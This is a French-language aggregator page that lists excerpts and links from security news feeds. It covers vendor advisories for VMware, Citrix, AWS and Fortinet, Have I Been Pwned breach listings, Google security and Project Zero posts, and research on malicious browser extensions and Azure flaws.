What is the Vulnerability?Multiple zero-day vulnerabilities have been identified in VMware's ESXi, Workstation, and Fusion products. VMware has confirmed that these vulnerabilities are being actively exploited in the wild, and the Cybersecurity and Infrastructure Security Agency (CISA) has included them in its Known Exploited Vulnerabilities Catalog due to evidence of such exploitation.The vendor advisory indicates that these vulnerabilities were reported to VMware by the Microsoft Threat Intelligence Center.• CVE-2025-22225: Arbitrary Write Vulnerability in VMware ESXi • CVE-2025-22224: TOCTOU Race Condition Vulnerability in VMware ESXi and Workstation • CVE-2025-22226: Information Disclosure Vulnerability in VMware ESXi, Workstation, and FusionWhat is the recommended Mitigation?Updates...
https://fortiguard.fortinet.com/threat-signal-report/6026
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Full exposure: A practical approach to handling sensitive data leaks
Treating exposures as full and complete can help you respond more effectively to focus on what truly matters: securing systems, protecting sensitive data, and maintaining the trust of stakeholders.
The post Full exposure: A practical approach to handling sensitive data leaks appeared first on The GitHub Blog.
https://github.blog/security/full-exposure-a-practical-approach-to-handling-sensitive-data-leaks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vulnerability Reward Program: 2024 in Review
Posted by Dirk GöhmannIn 2024, our Vulnerability Reward Program confirmed the ongoing value of engaging with the security research community to make Google and its products safer. This was evident as we awarded just shy of million to over 600 researchers based in countries around the globe across all of our programs.Vulnerability Reward Program 2024 in NumbersYou can learn about who's reporting to the Vulnerability Reward Program via our Leaderboard – and find out more about our youngest security researchers who've recently joined the ranks of Google bug hunters.VRP Highlights in 2024In 2024 we made a series of changes and improvements coming to our vulnerability reward programs and related initiatives:The Google VRP revamped its reward structure, bumping rewards up to a maximum...
http://security.googleblog.com/2025/03/vulnerability-reward-program-2024-in.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Legit SLA Management & Governance – Built for Enterprise-Scale AppSec
Get details on Legit's powerful SLA management capabilities.
https://www.legitsecurity.com/blog/legit-sla-management-and-governance
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Enterprises Should Consider Replacing Employees' Home TP-Link Routers
An examination of CVE trends from February 2025 scanning data.
https://www.f5.com/labs/articles/threat-intelligence/enterprises-should-consider-replacing-employees-home-tp-link-routers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Citrix NetScaler ADC and NetScaler Gateway Unauthenticated Remote Code Execution Vulnerability (CVE-2023-3519)
What is Citrix NetScaler ADC and NetScaler Gateway?Citrix NetScaler ADC, previously known as Citrix ADC, is an Application Delivery Controller (ADC) designed to achieve secure and optimized network traffic. Citrix NetScaler Gateway, previously known as Citrix Gateway, is an SSL-VPN solution designed to provide secure and optimized remote access. What is the Attack?According to the advisory published by Citrix, CVE-2023-3519 is an unauthenticated remote code execution vulnerability that affects the unmitigated Citrix NetScaler ADC and NetScaler Gateway products. For these products to be vulnerable, they must be configured either as a gateway or as an authentication, authorization, and auditing (AAA) virtual server. The advisory also confirms that Citrix-managed servers have already been mitigated,...
https://fortiguard.fortinet.com/threat-signal-report/5227
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
November 2024 Cyber Attacks Statistics
In November 2024, Cyber Crime continued to lead the Motivations chart with 72%, up from 68% of October. Operations driven...
https://www.hackmageddon.com/2025/03/05/november-2024-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Issue with Temporary elevated access management (TEAM) - CVE-2025-1969
Publication Date: 2025/03/04 10:30 AM PST
Description
Improper request input validation in Temporary Elevated Access Management (TEAM) for AWS IAM Identity Center allows a user to modify a valid request and spoof an approval in TEAM. We recommend customers upgrade TEAM to the latest release, version 1.2.2.
Affected versions: <1.2.2
Resolution
A fix has been released in version 1.2.2.
Please refer to the "Update TEAM solution" documentation for instructions on upgrading.
References
GHSA-x9xv-r58p-qh86
CVE-2025-1969
Acknowledgement
We would like to thank Redshift Cyber Security for collaborating on this issue through the coordinated vulnerability disclosure process.
Please email aws-security@amazon.com with any security questions or concerns....
https://aws.amazon.com/security/security-bulletins/AWS-2025-004/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
New AI-Powered Scam Detection Features to Help Protect You on Android
Posted by Lyubov Farafonova, Product Manager, Phone by Google; Alberto Pastor Nieto, Sr. Product Manager Google Messages and RCS Spam and Abuse
Google has been at the forefront of protecting users from the ever-growing threat of scams and fraud with cutting-edge technologies and security expertise for years. In 2024, scammers used increasingly sophisticated tactics and generative AI-powered tools to steal more than trillion from mobile consumers globally, according to the Global Anti-Scam Alliance. And with the majority of scams now delivered through phone calls and text messages, we've been focused on making Android's safeguards even more intelligent with powerful Google AI to help keep your financial information and data safe.
Today, we're launching two new industry-leading...
http://security.googleblog.com/2025/03/new-ai-powered-scam-detection-features.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Color Dating - 220,503 breached accounts
In September 2018, the dating app to match people with different ethnicities Color Dating suffered a data breach that was later redistributed as part of a larger corpus of data. The breach exposed 220k unique email addresses along with bios, names, profile photos and bcrypt password hashes. The data was provided to HIBP by a source who requested it be attributed to "ANK (Veles)".
https://haveibeenpwned.com/PwnedWebsites#ColorDating
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Flat Earth Sun, Moon and Zodiac App - 33,294 breached accounts
In October 2024, the flat earth sun, moon and zodiac app created by Flat Earth Dave was found to be leaking extensive personal information of its users. The data included 33k unique email addresses along with usernames, latitudes and longitudes (their position on the globe) and passwords stored in plain text. A small number of profiles also contained names, dates of birth and genders.
https://haveibeenpwned.com/PwnedWebsites#FlatEarthDave
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Spyzie - 518,643 breached accounts
In February 2025, the spyware service Spyzie suffered a data breach along with sibling spyware services, Spyic and Cocospy. The Spyzie breach alone exposed almost 519k customer email addresses which were provided to HIBP, and reportedly also enabled unauthorised access to captured messages, photos, call logs, and more. The data was provided to HIBP by a source who requested it be attributed to "zathienaephi@proton.me".
https://haveibeenpwned.com/PwnedWebsites#Spyzie
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
16-30 November 2024 Cyber Attacks Timeline
In the second timeline of November 2024 I collected 117 events (7.8 events/day) with a threat landscape dominated by malware
https://www.hackmageddon.com/2025/02/27/16-30-november-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Orange Romania - 556,557 breached accounts
In February 2025, the Romanian arm of telecommunications company Orange suffered a data breach which was subsequently published to a popular hacking forum. The data included 556k email addresses (of which hundreds of thousands were in the form of [phone number]@as1.romtelecom.net), phone numbers, subscription details, partial credit card data (type, last 4 digits, expiration date and issuing bank). The breach also exposed an extensive number of internal documents.
https://haveibeenpwned.com/PwnedWebsites#OrangeRomania
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Why AI Can't Replace Cybersecurity Analysts
As we face an extreme downturn in cybersecurity hiring which entry level candidates bear the brunt of, I want to address an elephant in the room: AI. I spend a lot of my time providing career clinics and mentorship, and I truly understand this is one of the worst cybersecurity job markets for young people […]
https://tisiphone.net/2025/02/26/why-ai-cant-replace-cybersecurity-analysts/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Phillip Wylie Show!
I made an appearance on the wonderful Phillip Wylie show! It was incredibly kind of him to have me on. We talked about a kind of niche area of ICS – how to do digital forensics in that space – especially weird and legacy stuff – and what that actually means during incident response. Check […]
https://tisiphone.net/2025/02/26/the-phillip-wylie-show/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Celebrating 1 Year of CSF 2.0
It has been one year since the release of the NIST Cybersecurity Framework (CSF) 2.0 ! To make improving your security posture even easier, in this blog we are: Sharing new CSF 2.0 resources; Taking a retrospective look at some resources and applications you may have missed; and Highlighting ways you can stay involved in our work, helping us help you implement better cybersecurity. NIST's subject matter experts have worked over the last year to continue expanding the CSF 2.0 implementation resources to help you secure your enterprise. Stakeholders are a very important force behind NIST's
https://www.nist.gov/blogs/cybersecurity-insights/celebrating-1-year-csf-20
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Silent Reaper (Azure LogicApp Secrets Control Plane Exfiltration)
Azure iPaaS services, such as Logic Apps, separate the Control Plane (management) from the Data Plane (execution), but a flaw in this model enabled undetectable data harvesting.
An attacker with Azure Reader access to workflow run history can silently extract sensitive data from executions, including secrets and API responses. This is possible because execution details are exposed via the Control Plane, bypassing Data Plane access controls.
The root cause of this issue is the unintended exposure of runtime data through metadata endpoints, which could allow an attacker to passively collect information without triggering alerts or requiring direct execution privileges.
https://www.cloudvulndb.org/azure-logic-apps-secrets-control-plane-exfiltration
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vault Recon (Azure KeyVault Secrets Metadata Control Plane Exfiltration)
Azure Key Vault enforces a separation between the Control Plane (management) and Data Plane (secrets access). However, a flaw in this isolation allows unauthorized users to enumerate secrets and keys within a vault.
By having Reader access or lesser privileges on a Key Vault, an attacker could leverage Azure Resource Explorer to access metadata about stored secrets. This is due to unintended exposure through the Control Plane, which should not provide insight into Data Plane resources.
The root cause of this issue is insufficient isolation between the two planes, where metadata retrieval is permitted even when direct access to secrets is restricted. This allows attackers to gain information about sensitive assets without full permissions.
https://www.cloudvulndb.org/azure-vault-recon-keyvault-secret-metadata-control-plane-exfiltration
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Securing tomorrow's software: the need for memory safety standards
Posted by Alex Rebert, Security Foundations, Ben Laurie, Research, Murali Vijayaraghavan, Research and Alex Richardson, SiliconFor decades, memory safety vulnerabilities have been at the center of various security incidents across the industry, eroding trust in technology and costing billions. Traditional approaches, like code auditing, fuzzing, and exploit mitigations – while helpful – haven't been enough to stem the tide, while incurring an increasingly high cost.In this blog post, we are calling for a fundamental shift: a collective commitment to finally eliminate this class of vulnerabilities, anchored on secure-by-design practices – not just for ourselves but for the generations that follow.The shift we are calling for is reinforced by a recent ACM article calling to standardize...
http://security.googleblog.com/2025/02/securing-tomorrows-software-need-for.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ALIEN TXTBASE Stealer Logs - 284,132,969 breached accounts
In February 2025, 23 billion rows of stealer logs were obtained from a Telegram channel known as ALIEN TXTBASE. The data contained 284M unique email addresses alongside the websites they were entered into and the passwords used. This data is now searchable in HIBP by both email domain and the domain of the target website.
https://haveibeenpwned.com/PwnedWebsites#AlienStealerLogs
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Passkeys
Don't we all know the hassle of managing loads of passwords, trying to come up with secure and unique ones only to try afterwards to remember them? Or always staying on high alert whether the URL is definitely the valid one for the website we are trying to visit?
What if all this could be over soon?
Welcome to Passkeys!
https://blog.compass-security.com/2025/02/passkeys/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
2024 Vulnerability Scanning Surges 91%
Scans intensify, looking for a critical vulnerability in TBK DVR devices.
https://www.f5.com/labs/articles/threat-intelligence/2024-vulnerability-scanning-surges-91
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Out with the Old, In with the Bold: Gen Threat Labs
For years, Avast Decoded has been your go-to for the latest in cybersecurity insights and research. But as cybercriminals evolve, so do we. Starting now, our groundbreaking research, expert analysis and the stories that keep the digital world safe are moving to one place: the Gen Insights Blog. By uniting our expertise under the Gen […]
The post Out with the Old, In with the Bold: Gen Threat Labs appeared first on Avast Threat Labs.
https://decoded.avast.io/salat/out-with-the-old-in-with-the-bold-gen-threat-labs/?utm_source=rss&utm_medium=rss&utm_campaign=out-with-the-old-in-with-the-bold-gen-threat-labs
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How GitHub uses CodeQL to secure GitHub
How GitHub's Product Security Engineering team manages our CodeQL implementation at scale and how you can, too.
The post How GitHub uses CodeQL to secure GitHub appeared first on The GitHub Blog.
https://github.blog/engineering/how-github-uses-codeql-to-secure-github/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Stealthy AD CS Reconnaissance
Introducing a certipy parse command to perform stealthy offline AD CS enumeration based on local registry data.
https://blog.compass-security.com/2025/02/stealthy-ad-cs-reconnaissance/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
1-15 November 2024 Cyber Attacks Timeline
In the first timeline of November 2024 I collected 128 events with a threat landscape dominated by malware...
https://www.hackmageddon.com/2025/02/06/1-15-november-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Lazarus Group Targets Organizations with Sophisticated LinkedIn Recruiting Scam
Bitdefender Labs warns of an active campaign by the North Korea-linked Lazarus Group, targeting organizations by capturing credentials and delivering malware through fake LinkedIn job offers.
LinkedIn may be a vital tool for job seekers and professionals, but it has also become a playground for cybercriminals exploiting its credibility. From fake job offers and elaborate phishing schemes to scams and even state-sponsored threat actors who prey on people's career aspirations and trust in profess
https://www.bitdefender.com/en-us/blog/labs/lazarus-group-targets-organizations-with-sophisticated-linkedin-recruiting-scam
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Analysis of an advanced malicious Chrome extension
Two weeks ago I published an article on 63 malicious Chrome extensions. In most cases I could only identify the extensions as malicious. With large parts of their logic being downloaded from some web servers, it wasn't possible to analyze their functionality in detail.
However, for the Download Manager Integration Checklist extension I have all parts of the puzzle now. This article is a technical discussion of its functionality that somebody tried very hard to hide. I was also able to identify a number of related extensions that were missing from my previous article.
Update (2025-02-04): An update to Download Manager Integration Checklist extension has been released a day before I published this article, clearly prompted by me asking adindex about this. The update removes the malicious functionality...
https://palant.info/2025/02/03/analysis-of-an-advanced-malicious-chrome-extension/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Windows Bug Class: Accessing Trapped COM Objects with IDispatch
Posted by James Forshaw, Google Project Zero
Object orientated remoting technologies such as DCOM and .NET Remoting make it very easy to develop an object-orientated interface to a service which can cross process and security boundaries. This is because they're designed to support a wide range of objects, not just those implemented in the service, but any other object compatible with being remoted. For example, if you wanted to expose an XML document across the client-server boundary, you could use a pre-existing COM or .NET library and return that object back to the client. By default when the object is returned it's marshaled by reference, which results in the object staying in the out-of-process server.
This flexibility has a number of downsides, one of which is the topic of this...
https://googleprojectzero.blogspot.com/2025/01/windows-bug-class-accessing-trapped-com.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Windows Exploitation Tricks: Trapping Virtual Memory Access (2025 Update)
Posted by James Forshaw, Google Project Zero
Back in 2021 I wrote a blog post about various ways you can build a virtual memory access trap primitive on Windows. The goal was to cause a reader or writer of a virtual memory address to halt for a significant (e.g. 1 or more seconds) amount of time, generally for the purpose of exploiting TOCTOU memory access bugs in the kernel.
The solutions proposed in the blog post were to either map an SMB file on a remote server, or abuse the Cloud Filter API. This blog isn't going to provide new solutions, instead I wanted to highlight a new feature of Windows 11 24H2 that introduces the ability to abuse the SMB file server directly on the local machine, no remote server required. This change also introduces the ability to locally exploit vulnerabilities...
https://googleprojectzero.blogspot.com/2025/01/windows-exploitation-tricks-trapping.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Path traversal issue in Deep Java Library - (CVE-2025-0851)
Publication Date: 2025/01/29 1:30 PM PST
AWS identified CVE-2025-0851, a path traversal issue in ZipUtils.unzip and TarUtils.untar in Deep Java Library (DJL) on all platforms that allows a bad actor to write files to arbitrary locations. If leveraged, an actor could gain SSH access by injecting an SSH key into the authorized_keys file, or upload HTML files to leverage cross-site scripting issues. We can confirm that this issue has not been leveraged. A fix for this issue has been released and we recommend the users of DJL upgrade to version 0.31.1 or later.
Affected versions: 0.1.0 - 0.31.0
Resolution
The patches are included in DJL 0.31.1.
Reference
CVE-2025-0851
GHSA-6h2x-4gjf-jc5w
Please email aws-security@amazon.com with any security questions or concerns.
https://aws.amazon.com/security/security-bulletins/AWS-2025-003/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How we kept the Google Play & Android app ecosystems safe in 2024
Posted by Bethel Otuteye and Khawaja Shams (Android Security and Privacy Team), and Ron Aquino (Play Trust and Safety)
Android and Google Play comprise a vibrant ecosystem with billions of users around the globe and millions of helpful apps. Keeping this ecosystem safe for users and developers remains our top priority. However, like any flourishing ecosystem, it also attracts its share of bad actors. That's why every year, we continue to invest in more ways to protect our community and fight bad actors, so users can trust the apps they download from Google Play and developers can build thriving businesses.
Last year, those investments included AI-powered threat detection, stronger privacy policies, supercharged developer tools, new industry-wide alliances, and more. As a result, we...
http://security.googleblog.com/2025/01/how-we-kept-google-play-android-app-ecosystem-safe-2024.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How we estimate the risk from prompt injection attacks on AI systems
Posted by the Agentic AI Security Team at Google DeepMindModern AI systems, like Gemini, are more capable than ever, helping retrieve data and perform actions on behalf of users. However, data from external sources present new security challenges if untrusted sources are available to execute instructions on AI systems. Attackers can take advantage of this by hiding malicious instructions in data that are likely to be retrieved by the AI system, to manipulate its behavior. This type of attack is commonly referred to as an "indirect prompt injection," a term first coined by Kai Greshake and the NVIDIA team.To mitigate the risk posed by this class of attacks, we are actively deploying defenses within our AI systems along with measurement and monitoring tools. One of these tools is a robust evaluation...
http://security.googleblog.com/2025/01/how-we-estimate-risk-from-prompt.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
BloodHound Community Edition Custom Queries
This blog post introduces our new custom queries for BloodHound Community Edition (CE) and explains how you can use them effectively to analyze your Active Directory infrastructure. TL;DR: Check out our new BloodHound CE custom queries! Active Directory and BloodHound The majority of our customers run a Microsoft Active Directory infrastructure, either exclusively on-prem or […]
https://blog.compass-security.com/2025/01/bloodhound-community-edition-custom-queries/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Privacy-Preserving Federated Learning – Future Collaboration and Continued Research
This post is the final blog in a series on privacy-preserving federated learning . The series is a collaboration between NIST and the UK government's Responsible Technology Adoption Unit (RTA), previously known as the Centre for Data Ethics and Innovation. Learn more and read all the posts published to date at NIST's Privacy Engineering Collaboration Space or RTA's blog . Reflections and Wider Considerations This is the final post in the series that began with reflections and learnings from the first US-UK collaboration working with Privacy Enhancing Technologies (PETs). Since the PETs Prize
https://www.nist.gov/blogs/cybersecurity-insights/privacy-preserving-federated-learning-future-collaboration-and
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Android enhances theft protection with Identity Check and expanded features
Posted by Jianing Sandra Guo, Product Manager, Android, Nataliya Stanetsky, Staff Program Manager, Android
Today, people around the world rely on their mobile devices to help them stay connected with friends and family, manage finances, keep track of healthcare information and more – all from their fingertips. But a stolen device in the wrong hands can expose sensitive data, leaving you vulnerable to identity theft, financial fraud and privacy breaches.
This is why we recently launched Android theft protection, a comprehensive suite of features designed to protect you and your data at every stage – before, during, and after device theft. As part of our commitment to help you stay safe on Android, we're expanding and enhancing these features to deliver even more robust protection...
http://security.googleblog.com/2025/01/android-theft-protection-identity-check-expanded-features.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.4.2 and 1.0.8 security patch versions published
Today, we are publishing the 1.4.2 and 1.0.8 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. The images on Docker Hub may not be immediately available on release day. Continue reading to learn what changed in each version.1.4.2
ClamAV 1.4.2 is a patch release with the following fixes: CVE-2025-20128: Fixed a possible buffer overflow read bug in the OLE2 file parser that could cause a denial-of-service (DoS) condition. This issue was introduced in version 1.0.0 and affects all currently supported versions. It will be fixed in:
1.4.2 and 1.0.8 Thank you to OSS-Fuzz for identifying this issue.
1.0.8
ClamAV 1.0.8 is a patch release with the following fixes:CVE-2025-20128:...
http://blog.clamav.net/2025/01/clamav-142-and-108-security-patch.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Continued Scanning for CVE-2023-1389
TP-Link draws the attention of the US Government.
https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
October 2024 Cyber Attacks Statistics
After the cyber attacks timelines, it's time to publish the statistics for October 2024 where I collected and analyzed 240 events...
https://www.hackmageddon.com/2025/01/21/october-2024-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Malicious extensions circumvent Google's remote code ban
As noted last week I consider it highly problematic that Google for a long time allowed extensions to run code they downloaded from some web server, an approach that Mozilla prohibited long before Google even introduced extensions to their browser. For years this has been an easy way for malicious extensions to hide their functionality. When Google finally changed their mind, it wasn't in form of a policy but rather a technical change introduced with Manifest V3.
As with most things about Manifest V3, these changes are meant for well-behaving extensions where they in fact improve security. As readers of this blog probably know, those who want to find loopholes will find them: I've already written about the Honey extension bundling its own JavaScript interpreter and malicious extensions...
https://palant.info/2025/01/20/malicious-extensions-circumvent-googles-remote-code-ban/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
OSV-SCALIBR: A library for Software Composition Analysis
Posted by Erik Varga, Vulnerability Management, and Rex Pan, Open Source Security TeamIn December 2022, we announced OSV-Scanner, a tool to enable developers to easily scan for vulnerabilities in their open source dependencies. Together with the open source community, we've continued to build this tool, adding remediation features, as well as expanding ecosystem support to 11 programming languages and 20 package manager formats. Today, we're excited to release OSV-SCALIBR (Software Composition Analysis LIBRary), an extensible library for SCA and file system scanning. OSV-SCALIBR combines Google's internal vulnerability management expertise into one scanning library with significant new capabilities such as:SCA for installed packages, standalone binaries, as well as source codeOSes...
http://security.googleblog.com/2025/01/osv-scalibr-library-for-software.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
16-31 October 2024 Cyber Attacks Timeline
In the second timeline of October 2024 I collected 120 events with a threat landscape dominated by malware...
https://www.hackmageddon.com/2025/01/16/16-31-october-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Hardcoded Encryption Key Used for Named Pipe Communication
A use of hard-coded cryptographic key (CWE-321) vulnerability in FortiClient Windows may allow a low-privileged user to decrypt interprocess communication via monitoring named pipe. Revised on 2025-04-16 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-216
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Integer Overflow in ipsec ike
An Integer Overflow or Wraparound vulnerability [CWE-190] in FortiOS and FortiSASE FortiOS tenant IPsec IKEv1 service may allow an authenticated attacker to crash the IPsec tunnel via crafted requests, resulting in potential denial of service. Revised on 2025-04-11 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-267
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Chrome Web Store is a mess
Let's make one thing clear first: I'm not singling out Google's handling of problematic and malicious browser extensions because it is worse than Microsoft's for example. No, Microsoft is probably even worse but I never bothered finding out. That's because Microsoft Edge doesn't matter, its market share is too small. Google Chrome on the other hand is used by around 90% of the users world-wide, and one would expect Google to take their responsibility to protect its users very seriously, right? After all, browser extensions are one selling point of Google Chrome, so certainly Google would make sure they are safe?
Unfortunately, my experience reporting numerous malicious or otherwise problematic browser extensions speaks otherwise. Google appears to take the “least effort required”...
https://palant.info/2025/01/13/chrome-web-store-is-a-mess/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
BIScience: Collecting browsing history under false pretenses
This is a guest post by a researcher who wants to remain anonymous. You can contact the author via email.
Recently, John Tuckner of Secure Annex and Wladimir Palant published great research about how BIScience and its various brands collect user data. This inspired us to publish part of our ongoing research to help the extension ecosystem be safer from bad actors.
This post details what BIScience does with the collected data and how their public disclosures are inconsistent with actual practices, based on evidence compiled over several years.
Screenshot of claims on the BIScience website
Contents
Who is BIScience?
BIScience collects data from millions of users
BIScience buys data from partner third-party extensions
BIScience receives raw...
https://palant.info/2025/01/13/biscience-collecting-browsing-history-under-false-pretenses/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Dangers of DNS Hijacking
How expired domains and improper DNS management can lead to severe security risks like MitM attacks, fraudulent TLS/SSL certifications, and more.
https://www.f5.com/labs/articles/threat-intelligence/the-dangers-of-dns-hijacking
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.4 as Next Long-Term Stable (LTS)
We are excited to announce that ClamAV 1.4 is now designated as our latest Long-Term Stable (LTS) release. Previously, we planned to announce 1.5 as the next LTS version at the end of 2024. However, unforeseen challenges have delayed the 1.5 release, leading us to choose version 1.4 for long-term support. We apologize for any inconvenience that our delay in the announcement may have caused. The version support dates for ClamAV 1.4 are amended as follows: Key Dates: Initial 1.4 Release Date: August 15, 2024 Patch Versions Continue Until: August 15, 2027 DB Downloads Allowed Until: August 15, 2028 For specific details, please read the ClamAV EOL Policy. Looking ahead, the beta version of ClamAV 1.5 will soon be available for community review. This version will...
http://blog.clamav.net/2025/01/clamav-14-as-next-long-term-stable-lts.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How extensions trick CWS search
A few months ago I searched for “Norton Password Manager” in Chrome Web Store and got lots of seemingly unrelated results. Not just that, the actual Norton Password Manager was listed last. These search results are still essentially the same today, only that Norton Password Manager moved to the top of the list:
I was stumped how Google managed to mess up search results so badly and even posted the following on Mastodon:
Interesting. When I search for “Norton Password Manager” on Chrome Web Store, it first lists five completely unrelated extensions, and only the last search result is the actual Norton Password Manager. Somebody told me that website is run by a company specializing in search, so this shouldn't be due to incompetence, right? What is it then?
Somebody suggested that...
https://palant.info/2025/01/08/how-extensions-trick-cws-search/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
1-15 October 2024 Cyber Attacks Timeline
In the first timeline of October 2024, I collected 120 events (8 events/day) with a threat landscape...
https://www.hackmageddon.com/2025/01/07/1-15-october-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Windows Registry Adventure #5: The regf file format
Posted by Mateusz Jurczyk, Google Project Zero
As previously mentioned in the second installment of the blog post series ("A brief history of the feature"), the binary format used to encode registry hives from Windows NT 3.1 up to the modern Windows 11 is called regf. In a way, it is quite special, because it represents a registry subtree simultaneously on disk and in memory, as opposed to most other common file formats. Documents, images, videos, etc. are generally designed to store data efficiently on disk, and they are subsequently parsed to and from different in-memory representations whenever they are read or written. This seems only natural, as offline storage and RAM come with different constraints and requirements. On disk, it is important that the data is packed as...
https://googleprojectzero.blogspot.com/2024/12/the-windows-registry-adventure-5-regf.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
NIST's International Cybersecurity and Privacy Engagement Update – New Translations
As the year comes to a close, NIST continues to engage with our international partners to strengthen cybersecurity, including sharing over ten new international translations in over six languages as resources for our stakeholders around the world. These efforts were complemented by discussions on opportunities for future enhanced international collaboration and resource sharing. Here are some updates from the past few months: Our international engagement continues through our support to the Department of State and the International Trade Administration (ITA) during numerous international
https://www.nist.gov/blogs/cybersecurity-insights/nists-international-cybersecurity-and-privacy-engagement-update-new
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Credentials can be dumped from memory
A Cleartext Storage of Sensitive Information vulnerability [CWE-312] in FortiClient Windows and FortiClient Linux may permit a local authenticated user to retrieve VPN password via memory dump, due to JavaScript's garbage collector Revised on 2025-04-22 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-23-278
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
2025 Cybersecurity Predictions
“I never think of the future. It comes soon enough.”
https://www.f5.com/labs/articles/cisotociso/2025-cybersecurity-predictions
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Qualcomm DSP Driver - Unexpectedly Excavating an Exploit
Posted by Seth Jenkins, Google Project ZeroThis blog post provides a technical analysis of exploit artifacts provided to us by Google's Threat Analysis Group (TAG) from Amnesty International. Amnesty’s report on these exploits is available here. Thanks to both Amnesty International and Google's Threat Analysis Group for providing the artifacts and collaborating on the subsequent technical analysis!IntroductionEarlier this year, Google's TAG received some kernel panic logs generated by an In-the-Wild (ITW) exploit. Those logs kicked off a bug hunt that led to the discovery of 6 vulnerabilities in one Qualcomm driver over the course of 2.5 months, including one issue that TAG reported as ITW. This blog post covers the details of the original artifacts, each of the bugs discovered,...
https://googleprojectzero.blogspot.com/2024/12/qualcomm-dsp-driver-unexpectedly-excavating-exploit.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Dirty DAG - Azure Apache Airflow Integration Vulnerabilities
Unit 42 researchers identified vulnerabilities in the Azure Data Factory's integration with Apache Airflow. These vulnerabilities include misconfigured Kubernetes Role-Based Access Control (RBAC), improper secret handling in Azure's internal Geneva service, and weak authentication mechanisms.
Exploiting these flaws, attackers could gain shadow admin control over Azure infrastructure by crafting malicious DAG files or compromising service principals, leading to unauthorized access, data exfiltration, malware deployment, and persistent control of the cluster.
Once attackers gain access, they can escalate privileges within the Azure Kubernetes Service (AKS) cluster, compromise containerized environments, and exploit Azure's Geneva service to manipulate logs and metrics.
The research highlighted...
https://www.cloudvulndb.org/azure-airflow-vulnerabilities
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ways to Mitigate Risk in Cybersecurity: Cybersecurity Risk Management
Cyber threats can wreak havoc on businesses, from data breaches to loss of reputation. Luckily, there are effective strategies available that can reduce cybersecurity risk. Avoidance is one of the...
The post Ways to Mitigate Risk in Cybersecurity: Cybersecurity Risk Management appeared first on Hacker Combat.
https://www.hackercombat.com/cybersecurity-risk-management/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Windows Tooling Updates: OleView.NET
Posted by James Forshaw, Google Project ZeroThis is a short blog post about some recent improvements I've been making to the OleView.NET tool which has been released as part of version 1.16. The tool is designed to discover the attack surface of Windows COM and find security vulnerabilities such as privilege escalation and remote code execution. The updates were recently presented at the Microsoft Bluehat conference in Redmond under the name "DCOM Research for Everyone!". This blog expands on the topics discussed to give a bit more background and detail that couldn't be fit within the 45-minute timeslot. This post assumes a knowledge of COM as I'm only going to describe a limited number of terms.Using the OleView.NET Tooling
Before we start the discussion it's important...
https://googleprojectzero.blogspot.com/2024/12/windows-tooling-updates-oleviewnet.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Issue with DynamoDB local - CVE-2022-1471
Publication Date: 2024/12/11 2:00PM PST
